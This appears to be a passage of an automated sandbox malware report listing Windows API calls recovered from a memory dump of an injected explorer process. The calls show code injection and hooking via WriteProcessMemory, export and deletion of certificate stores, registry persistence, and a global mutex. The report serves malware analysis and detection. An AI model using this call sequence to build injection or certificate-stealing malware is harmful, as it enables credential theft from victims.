Part of subcall function 01B55ECF: PathRemoveFileSpecW.SHLWAPI(01B725D0), ref: 01B55F07
Part of subcall function 01B55ECF: PathRenameExtensionW.SHLWAPI(?,.tmp), ref: 01B55F23
Part of subcall function 01B55ECF: GetFileAttributesW.KERNEL32(01B723C8,01B725D0,01B725D0,?,?,01B56527,00000000,?,00000000,00000330,?,?,00000102), ref: 01B55F46

GetFileAttributesW.KERNEL32(?,00000000,?,00000000,00000330,?,?,00000102), ref: 01B56538
GetFileAttributesW.KERNEL32(01B723C8), ref: 01B5654B
CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 01B56571
CloseHandle.KERNEL32(00000000), ref: 01B5658F
lstrcmpiW.KERNEL32(?,?), ref: 01B565BF
MoveFileExW.KERNEL32(?,?,0000000B), ref: 01B565E7

Part of subcall function 01B56BD7: RegOpenKeyExW.ADVAPI32(80000001,01B727F0,00000000,00000001,?,?), ref: 01B56C00

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Part of subcall function 01B56010: GetTickCount.KERNEL32(0000271B,00020000,?,00002719,00020000,?,?,00000000,00000000), ref: 01B5610F
Part of subcall function 01B56010: GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,00000002,?,00000000,00000000), ref: 01B56162
Part of subcall function 01B56010: GetModuleFileNameW.KERNEL32(00000000,?,00000103,?,00000000,00000000), ref: 01B561A4
Part of subcall function 01B56010: GetUserNameExW.SECUR32(00000002,?,00000104), ref: 01B561E6

Part of subcall function 01B5680D: WaitForSingleObject.KERNEL32(?,00001388), ref: 01B5685A
Part of subcall function 01B5680D: Sleep.KERNEL32(00001388,?,?,?,00000000,?,?,-78D0C214,00000002), ref: 01B56869

Part of subcall function 01B69354: FlushFileBuffers.KERNEL32(00000000), ref: 01B69360
Part of subcall function 01B69354: CloseHandle.KERNEL32(?), ref: 01B69368

Part of subcall function 01B68716: SetFileAttributesW.KERNEL32(00000080,00000080,01B6B4CD,?), ref: 01B6871F
Part of subcall function 01B68716: DeleteFileW.KERNEL32(?), ref: 01B68729

Part of subcall function 01B686EF: GetFileSizeEx.KERNEL32(?,?,?,?,?,01B56588,00000000), ref: 01B686FB

WaitForSingleObject.KERNEL32(00007530,?), ref: 01B5668B

Part of subcall function 01B66B8E: ReleaseMutex.KERNEL32(00000000,01B63021,?,?,?), ref: 01B66B92

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B64B0F, Relevance: 10.6, APIs: 7, Instructions: 74

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000,?,?,?,01B61E08,00000000,01B622ED,?,?,00000000), ref: 01B64B1F
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,76C61857,?,?,?,01B61E08,00000000,01B622ED,?,?,00000000), ref: 01B64B3F
GetLastError.KERNEL32(?,?,?,01B61E08,00000000,01B622ED,?,?,00000000), ref: 01B64B45

Part of subcall function 01B6338B: HeapAlloc.KERNEL32(00000008,-00000004,01B64B59,00000000,?,?,?,01B61E08,00000000,01B622ED,?,?,00000000), ref: 01B6339C

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,00000000,?,?,?,01B61E08,00000000,01B622ED,?,?,00000000), ref: 01B64B6C
GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,01B61E08,00000000,01B622ED,?,?,00000000), ref: 01B64B74
GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,01B61E08,00000000,01B622ED,?,?,00000000), ref: 01B64B8B

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

CloseHandle.KERNEL32(?), ref: 01B64BB6

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B67BF7, Relevance: 7.6, APIs: 5, Instructions: 108

APIs

Part of subcall function 01B67BB2: VirtualQueryEx.KERNEL32(000000FF,DB84D88A,?,0000001C,01B5C168,DB84D88A,?,?,?,01B5BD76,00000000,00000000,00000004,?,?,01B5C160), ref: 01B67BC7

VirtualProtectEx.KERNELBASE(000000FF,01B5C160,0000001E,00000040,01B72360,01B5C158,00000004,?,?,?,?,01B5BE97,6A01B723,00000000), ref: 01B67C24
ReadProcessMemory.KERNELBASE(000000FF,01B5C160,?,0000001E,00000000,?,00000090,00000023,?,?,?,?,01B5BE97,6A01B723,00000000), ref: 01B67C4B
WriteProcessMemory.KERNELBASE(000000FF,?,?,00000005,00000000,?,00000000,00000000), ref: 01B67CC5
WriteProcessMemory.KERNELBASE(000000FF,?,000000E9,00000005,00000000), ref: 01B67CED
VirtualProtectEx.KERNELBASE(000000FF,01B5C160,0000001E,01B72360,01B72360,?,?,?,?,01B5BE97,6A01B723,00000000,?,?,01B5C160,01B72360), ref: 01B67D05

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B5BBD5, Relevance: 7.6, APIs: 5, Instructions: 72

APIs

GetCurrentThread.KERNEL32(00000000), ref: 01B5BBE0
SetThreadPriority.KERNEL32(00000000), ref: 01B5BBE7

Part of subcall function 01B62507: CreateMutexW.KERNELBASE(01B72C30,00000000,?,?,?,?,?), ref: 01B62528

Part of subcall function 01B62828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 01B628A1

PathQuoteSpacesW.SHLWAPI(?), ref: 01B5BC2A

Part of subcall function 01B6262D: WaitForSingleObject.KERNEL32(00000000,01B5776D), ref: 01B62635

WaitForSingleObject.KERNEL32(000000C8), ref: 01B5BC62

Part of subcall function 01B6763A: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,01B69EAB,?,?,00000004), ref: 01B67658
Part of subcall function 01B6763A: RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,01B69EAB,?,?,01B69EAB,?,?,00000004,?,00000004), ref: 01B67672
Part of subcall function 01B6763A: RegCloseKey.ADVAPI32(00000004,?,?,01B69EAB,?,?,00000004,?,00000004), ref: 01B67681

WaitForSingleObject.KERNEL32(000000C8,?), ref: 01B5BC98

Part of subcall function 01B66B8E: ReleaseMutex.KERNEL32(00000000,01B63021,?,?,?), ref: 01B66B92

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B6768E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54

APIs

RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000,SOFTWARE\Microsoft\Xyuxy,00000000), ref: 01B676B3

Part of subcall function 01B6338B: HeapAlloc.KERNEL32(00000008,-00000004,01B64B59,00000000,?,?,?,01B61E08,00000000,01B622ED,?,?,00000000), ref: 01B6339C

RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000), ref: 01B676E2

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

RegCloseKey.KERNEL32(?), ref: 01B67702

Strings

SOFTWARE\Microsoft\Xyuxy, xrefs: 01B67699

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B5BB5F, Relevance: 6.0, APIs: 4, Instructions: 45

APIs

Part of subcall function 01B62507: CreateMutexW.KERNELBASE(01B72C30,00000000,?,?,?,?,?), ref: 01B62528

Part of subcall function 01B6262D: WaitForSingleObject.KERNEL32(00000000,01B5776D), ref: 01B62635

GetCurrentThread.KERNEL32(000000F1,19367401,00000001), ref: 01B5BB89
SetThreadPriority.KERNEL32(00000000), ref: 01B5BB90
WaitForSingleObject.KERNEL32(00001388), ref: 01B5BBA8

Part of subcall function 01B631CC: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01B631ED
Part of subcall function 01B631CC: Process32FirstW.KERNEL32(000001E6,?), ref: 01B63216
Part of subcall function 01B631CC: OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 01B63271
Part of subcall function 01B631CC: CloseHandle.KERNEL32(00000000), ref: 01B6328E
Part of subcall function 01B631CC: GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 01B632A1
Part of subcall function 01B631CC: CloseHandle.KERNEL32(?), ref: 01B6330E
Part of subcall function 01B631CC: Process32NextW.KERNEL32(000001E6,0000022C), ref: 01B6331A
Part of subcall function 01B631CC: CloseHandle.KERNEL32(000001E6), ref: 01B6332B

WaitForSingleObject.KERNEL32(00001388), ref: 01B5BBBD

Part of subcall function 01B66B8E: ReleaseMutex.KERNEL32(00000000,01B63021,?,?,?), ref: 01B66B92

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B5E89E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69

APIs

RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 01B5E8E0

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Part of subcall function 01B6768E: RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000,SOFTWARE\Microsoft\Xyuxy,00000000), ref: 01B676B3
Part of subcall function 01B6768E: RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000), ref: 01B676E2
Part of subcall function 01B6768E: RegCloseKey.KERNEL32(?), ref: 01B67702

Strings

Qanyodfyy, xrefs: 01B5E8B7, 01B5E8F2
SOFTWARE\Microsoft\Xyuxy, xrefs: 01B5E8A7, 01B5E8B2, 01B5E8BE, 01B5E8D9

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B66AAA, Relevance: 4.5, APIs: 3, Instructions: 41

APIs

GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,00000000,00000000,?,?,01B649F4,?,?,?,01B62326,000000FF,01B72C08), ref: 01B66AC3
GetLastError.KERNEL32(?,?,01B649F4,?,?,?,01B62326,000000FF,01B72C08,?,?,00000000), ref: 01B66AC9

Part of subcall function 01B6338B: HeapAlloc.KERNEL32(00000008,-00000004,01B64B59,00000000,?,?,?,01B61E08,00000000,01B622ED,?,?,00000000), ref: 01B6339C

GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,?,?,01B649F4,?,?,?,01B62326,000000FF,01B72C08), ref: 01B66AEF

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B649D2, Relevance: 4.5, APIs: 3, Instructions: 37

APIs

OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,01B62326,000000FF,01B72C08,?,?,00000000), ref: 01B649E2

Part of subcall function 01B66AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,00000000,00000000,?,?,01B649F4,?,?,?,01B62326,000000FF,01B72C08), ref: 01B66AC3
Part of subcall function 01B66AAA: GetLastError.KERNEL32(?,?,01B649F4,?,?,?,01B62326,000000FF,01B72C08,?,?,00000000), ref: 01B66AC9
Part of subcall function 01B66AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,?,?,01B649F4,?,?,?,01B62326,000000FF,01B72C08), ref: 01B66AEF

GetTokenInformation.KERNELBASE(?,0000000C,00000000,00000004,00000000,?,?,?,01B62326,000000FF,01B72C08), ref: 01B64A0E

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

CloseHandle.KERNEL32(?), ref: 01B64A23

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B6763A, Relevance: 4.5, APIs: 3, Instructions: 36

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,01B69EAB,?,?,00000004), ref: 01B67658
RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,01B69EAB,?,?,01B69EAB,?,?,00000004,?,00000004), ref: 01B67672
RegCloseKey.ADVAPI32(00000004,?,?,01B69EAB,?,?,00000004,?,00000004), ref: 01B67681

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B62BA3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83

APIs

Part of subcall function 01B620C4: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 01B62105
Part of subcall function 01B620C4: LoadLibraryA.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 01B62172
Part of subcall function 01B620C4: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 01B621DB
Part of subcall function 01B620C4: GetProcAddress.KERNEL32(00000000,NtCreateThread,?,?,00000000), ref: 01B621FA
Part of subcall function 01B620C4: GetProcAddress.KERNEL32(NtCreateUserProcess,?,?,00000000), ref: 01B6220C
Part of subcall function 01B620C4: GetProcAddress.KERNEL32(NtQueryInformationProcess,?,?,00000000), ref: 01B6221E
Part of subcall function 01B620C4: GetProcAddress.KERNEL32(RtlUserThreadStart,?,?,00000000), ref: 01B62230
Part of subcall function 01B620C4: GetProcAddress.KERNEL32(LdrLoadDll,?,?,00000000), ref: 01B62242
Part of subcall function 01B620C4: GetProcAddress.KERNEL32(LdrGetDllHandle,?,?,00000000), ref: 01B62254
Part of subcall function 01B620C4: HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 01B6228D
Part of subcall function 01B620C4: GetProcessHeap.KERNEL32(?,?,00000000), ref: 01B6229C
Part of subcall function 01B620C4: InitializeCriticalSection.KERNEL32(01B7400C,?,?,00000000), ref: 01B622C9
Part of subcall function 01B620C4: WSAStartup.WS2_32(00000202,?), ref: 01B622DF
Part of subcall function 01B620C4: CreateEventW.KERNEL32(01B72C30,00000001,00000000,00000000,?,?,00000000), ref: 01B62300
Part of subcall function 01B620C4: GetLengthSid.ADVAPI32(00000000,000000FF,01B72C08,?,?,00000000), ref: 01B62335
Part of subcall function 01B620C4: GetCurrentProcessId.KERNEL32(00000000,08A4F7D0,00000000,?,?,00000000), ref: 01B62362

Part of subcall function 01B62A32: CloseHandle.KERNEL32(01B72AF0), ref: 01B62AF2

Part of subcall function 01B5E959: CreateMutexW.KERNELBASE(Function_00022C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,01B54E69,?,?,?,743C152E,00000002), ref: 01B5E97F

CoInitializeEx.OLE32(00000000,00000002), ref: 01B62C62

Part of subcall function 01B69837: CoUninitialize.OLE32 ref: 01B69845

Part of subcall function 01B6D486: CertOpenSystemStoreW.CRYPT32(00000000,01B54BBC,?,00000000,00000001), ref: 01B6D4A1
Part of subcall function 01B6D486: CertEnumCertificatesInStore.CRYPT32(00000000,00000000,?,00000000,00000001), ref: 01B6D4BD
Part of subcall function 01B6D486: CertEnumCertificatesInStore.CRYPT32(?,00000000,?,00000000,00000001), ref: 01B6D4C9
Part of subcall function 01B6D486: PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 01B6D508
Part of subcall function 01B6D486: PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 01B6D538
Part of subcall function 01B6D486: CharLowerW.USER32 ref: 01B6D556
Part of subcall function 01B6D486: GetSystemTime.KERNEL32(?,?,?,00000000,00000001), ref: 01B6D561
Part of subcall function 01B6D486: CertCloseStore.CRYPT32(?,00000000), ref: 01B6D5EA

Part of subcall function 01B6D5FB: CertOpenSystemStoreW.CRYPT32(00000000,01B54BBC,?,00000001,01B62C2A), ref: 01B6D606
Part of subcall function 01B6D5FB: CertDuplicateCertificateContext.CRYPT32(00000000,?,?,00000001,01B62C2A), ref: 01B6D61F
Part of subcall function 01B6D5FB: CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,01B62C2A), ref: 01B6D62A
Part of subcall function 01B6D5FB: CertEnumCertificatesInStore.CRYPT32(00000000,00000000,00000000,?,?,00000001,01B62C2A), ref: 01B6D632
Part of subcall function 01B6D5FB: CertCloseStore.CRYPT32(00000000,00000000,?,?,00000001,01B62C2A), ref: 01B6D63E

Part of subcall function 01B6A138: SHGetFolderPathW.SHELL32(00000000,00000021,00000000,00000000,?), ref: 01B6A170

Strings

@, xrefs: 01B62C99

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B5E959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30

APIs

CreateMutexW.KERNELBASE(Function_00022C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,01B54E69,?,?,?,743C152E,00000002), ref: 01B5E97F

Part of subcall function 01B5E89E: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 01B5E8E0

Part of subcall function 01B66B07: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 01B66B0A
Part of subcall function 01B66B07: CloseHandle.KERNEL32(00000000), ref: 01B66B1C

Strings

Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769}, xrefs: 01B5E95A, 01B5E963, 01B5E96C, 01B5E977

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B69D6D, Relevance: 3.2, APIs: 2, Instructions: 172

APIs

InitializeCriticalSection.KERNEL32(01B73F24,00000000,7718F8FF), ref: 01B69D8F

Part of subcall function 01B67595: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,01B69E26,?,?), ref: 01B675AD

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000), ref: 01B69E63

Part of subcall function 01B6763A: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,01B69EAB,?,?,00000004), ref: 01B67658
Part of subcall function 01B6763A: RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,01B69EAB,?,?,01B69EAB,?,?,00000004,?,00000004), ref: 01B67672
Part of subcall function 01B6763A: RegCloseKey.ADVAPI32(00000004,?,?,01B69EAB,?,?,00000004,?,00000004), ref: 01B67681

Part of subcall function 01B640AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01B640CF

Part of subcall function 01B67711: RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,80000001,01B69E78,?), ref: 01B6771E
Part of subcall function 01B67711: RegCloseKey.KERNEL32(?), ref: 01B6772E

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B67477, Relevance: 3.0, APIs: 2, Instructions: 22

APIs

SetLastError.KERNEL32(0000009B,01B62AC8,00000000,01B5BB5F,00000000,01B72AF0,00000000,00000104,76C605D7,00000000), ref: 01B67481
CreateThread.KERNEL32(00000000,01B72AF0,01B72AF0,01B72AF0,00000000,00000000), ref: 01B674A4

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B67607, Relevance: 3.0, APIs: 2, Instructions: 20

APIs

RegQueryValueExW.KERNEL32(?,?,00000000,?,01B69E26,?,?,?,01B675CD,?,?,00000000,00000004,?), ref: 01B6761F
RegCloseKey.KERNEL32(?,?,01B675CD,?,?,00000000,00000004,?,?,?,?,01B69E26,?,?), ref: 01B6762D

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B67711, Relevance: 3.0, APIs: 2, Instructions: 18

APIs

RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,80000001,01B69E78,?), ref: 01B6771E
RegCloseKey.KERNEL32(?), ref: 01B6772E

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B5BE3B, Relevance: 1.6, APIs: 1, Instructions: 62

APIs

VirtualAllocEx.KERNELBASE(000000FF,00000000,00000004,00003000,00000040,00000000,76C61857,?,?,01B5C160,01B72360), ref: 01B5BE72

Part of subcall function 01B5BD44: VirtualProtectEx.KERNEL32(000000FF,DB84D88A,0000001E,00000040,01B5C160,00000000,00000000,00000004,?,?,01B5C160,01B72360), ref: 01B5BD86
Part of subcall function 01B5BD44: WriteProcessMemory.KERNEL32(000000FF,DB84D88A,?,35FFC690,00000000,?,?,01B5C160,01B72360), ref: 01B5BD9C
Part of subcall function 01B5BD44: VirtualProtectEx.KERNEL32(000000FF,DB84D88A,0000001E,01B5C160,01B5C160,?,?,01B5C160,01B72360), ref: 01B5BDB6

Part of subcall function 01B67BF7: VirtualProtectEx.KERNELBASE(000000FF,01B5C160,0000001E,00000040,01B72360,01B5C158,00000004,?,?,?,?,01B5BE97,6A01B723,00000000), ref: 01B67C24
Part of subcall function 01B67BF7: ReadProcessMemory.KERNELBASE(000000FF,01B5C160,?,0000001E,00000000,?,00000090,00000023,?,?,?,?,01B5BE97,6A01B723,00000000), ref: 01B67C4B
Part of subcall function 01B67BF7: WriteProcessMemory.KERNELBASE(000000FF,?,?,00000005,00000000,?,00000000,00000000), ref: 01B67CC5
Part of subcall function 01B67BF7: WriteProcessMemory.KERNELBASE(000000FF,?,000000E9,00000005,00000000), ref: 01B67CED
Part of subcall function 01B67BF7: VirtualProtectEx.KERNELBASE(000000FF,01B5C160,0000001E,01B72360,01B72360,?,?,?,?,01B5BE97,6A01B723,00000000,?,?,01B5C160,01B72360), ref: 01B67D05

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B56F38, Relevance: 1.5, APIs: 1, Instructions: 49

APIs

Part of subcall function 01B62507: CreateMutexW.KERNELBASE(01B72C30,00000000,?,?,?,?,?), ref: 01B62528

Part of subcall function 01B6262D: WaitForSingleObject.KERNEL32(00000000,01B5776D), ref: 01B62635

WaitForSingleObject.KERNEL32(?,00000000), ref: 01B56FB2

Part of subcall function 01B66B8E: ReleaseMutex.KERNEL32(00000000,01B63021,?,?,?), ref: 01B66B92

Part of subcall function 01B56DE7: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 01B56EC8

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B67595, Relevance: 1.5, APIs: 1, Instructions: 35

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,01B69E26,?,?), ref: 01B675AD

Part of subcall function 01B67607: RegQueryValueExW.KERNEL32(?,?,00000000,?,01B69E26,?,?,?,01B675CD,?,?,00000000,00000004,?), ref: 01B6761F
Part of subcall function 01B67607: RegCloseKey.KERNEL32(?,?,01B675CD,?,?,00000000,00000004,?,?,?,?,01B69E26,?,?), ref: 01B6762D

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B5E692, Relevance: 1.5, APIs: 1, Instructions: 25

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 01B5E6D0

Part of subcall function 01B6262D: WaitForSingleObject.KERNEL32(00000000,01B5776D), ref: 01B62635

Part of subcall function 01B5E240: GetMenu.USER32(?), ref: 01B5E26A
Part of subcall function 01B5E240: GetMenuItemCount.USER32(00000000), ref: 01B5E280
Part of subcall function 01B5E240: GetMenuState.USER32(00000000,00000000,00000400), ref: 01B5E298
Part of subcall function 01B5E240: HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 01B5E2A8
Part of subcall function 01B5E240: MenuItemFromPoint.USER32(?,00000000,?,?), ref: 01B5E2CE
Part of subcall function 01B5E240: GetMenuState.USER32(00000000,00000000,00000400), ref: 01B5E2E2
Part of subcall function 01B5E240: EndMenu.USER32 ref: 01B5E2F2
Part of subcall function 01B5E240: HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 01B5E302
Part of subcall function 01B5E240: GetSubMenu.USER32(00000000,00000000), ref: 01B5E326
Part of subcall function 01B5E240: GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 01B5E340
Part of subcall function 01B5E240: TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 01B5E361
Part of subcall function 01B5E240: GetMenuItemID.USER32(00000000,00000000), ref: 01B5E379
Part of subcall function 01B5E240: SendMessageW.USER32(?,00000111,?,00000000), ref: 01B5E392
Part of subcall function 01B5E240: SetKeyboardState.USER32 ref: 01B5E3D1
Part of subcall function 01B5E240: SetEvent.KERNEL32 ref: 01B5E3DD

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B5E45C, Relevance: 1.5, APIs: 1, Instructions: 24

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 01B5E497

Part of subcall function 01B6262D: WaitForSingleObject.KERNEL32(00000000,01B5776D), ref: 01B62635

Part of subcall function 01B5E240: GetMenu.USER32(?), ref: 01B5E26A
Part of subcall function 01B5E240: GetMenuItemCount.USER32(00000000), ref: 01B5E280
Part of subcall function 01B5E240: GetMenuState.USER32(00000000,00000000,00000400), ref: 01B5E298
Part of subcall function 01B5E240: HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 01B5E2A8
Part of subcall function 01B5E240: MenuItemFromPoint.USER32(?,00000000,?,?), ref: 01B5E2CE
Part of subcall function 01B5E240: GetMenuState.USER32(00000000,00000000,00000400), ref: 01B5E2E2
Part of subcall function 01B5E240: EndMenu.USER32 ref: 01B5E2F2
Part of subcall function 01B5E240: HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 01B5E302
Part of subcall function 01B5E240: GetSubMenu.USER32(00000000,00000000), ref: 01B5E326
Part of subcall function 01B5E240: GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 01B5E340
Part of subcall function 01B5E240: TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 01B5E361
Part of subcall function 01B5E240: GetMenuItemID.USER32(00000000,00000000), ref: 01B5E379
Part of subcall function 01B5E240: SendMessageW.USER32(?,00000111,?,00000000), ref: 01B5E392
Part of subcall function 01B5E240: SetKeyboardState.USER32 ref: 01B5E3D1
Part of subcall function 01B5E240: SetEvent.KERNEL32 ref: 01B5E3DD

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B62507, Relevance: 1.5, APIs: 1, Instructions: 23

APIs

CreateMutexW.KERNELBASE(01B72C30,00000000,?,?,?,?,?), ref: 01B62528

Part of subcall function 01B66B07: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 01B66B0A
Part of subcall function 01B66B07: CloseHandle.KERNEL32(00000000), ref: 01B66B1C

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B5BB09, Relevance: 1.5, APIs: 1, Instructions: 19

APIs

PeekMessageW.USER32(?), ref: 01B5BB1E

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

